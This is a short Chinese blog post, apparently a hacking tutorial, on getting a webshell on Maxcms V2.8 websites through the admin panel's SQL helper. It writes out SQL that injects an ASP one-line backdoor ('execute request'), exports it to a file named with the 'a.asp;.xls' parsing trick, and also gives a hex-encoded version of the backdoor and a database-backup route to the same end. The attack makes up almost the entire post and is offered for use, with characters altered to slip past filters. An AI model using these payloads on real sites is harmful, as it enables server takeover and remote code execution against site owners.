由于本人網(wǎng)站所在服務(wù)器會(huì)過濾某些關(guān)鍵字，過濾成****，所以這里的某些字符我給替換一下，你們懂的！請去掉&就可以了。
程序版本為Maxcms V2.8，而網(wǎng)絡(luò)上有的獲取 shell 版本在2.5。2.5中大部分方法都已經(jīng)不行。
后臺(tái)有個(gè) SQL高級(jí)助手，于是立刻想到兩種思路。第一是通過Access導(dǎo)出a.asp;.Xls的方式。另一種是一句話直接寫入數(shù)據(jù)庫，將其備份為asp程序執(zhí)行。
第一種方法比較好實(shí)現(xiàn)。如下語句就可以辦到。
create table a (a v&a&r&c&h&a&r(50))
insert into a (a) values ('<%e&x&e&cute request("value")%>')
select * into [a] in 'D:\web\a.asp;.xls' 'excel 4.0;' from a
獨(dú)自等待補(bǔ)充：
SELECT '<%e&x&e&cute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

其實(shí)使用這一句話就可以的，但是前提是表a是存在的，原作者的是可以成功的，這里只是多給一種方法。
第二種方式是采用將一句話寫入數(shù)據(jù)庫。備份出來，但由于數(shù)據(jù)庫中存在著防下載表。就算寫進(jìn)了數(shù)據(jù)庫也不一定爆得出源碼，于是在SQL高級(jí)助手處使用如下語句。
update XXXX set notdown=0x3C2565786563757465287265717565737428226C222929253E
原理就不多說了。自己百度，這樣/inc/datas.asp就能爆出代碼。
通過后臺(tái) → 模板 → 自定義標(biāo)簽處往數(shù)據(jù)庫中寫入一句話，然后從后臺(tái)將數(shù)據(jù)庫備份成asp文件

關(guān)健詞：Maxcms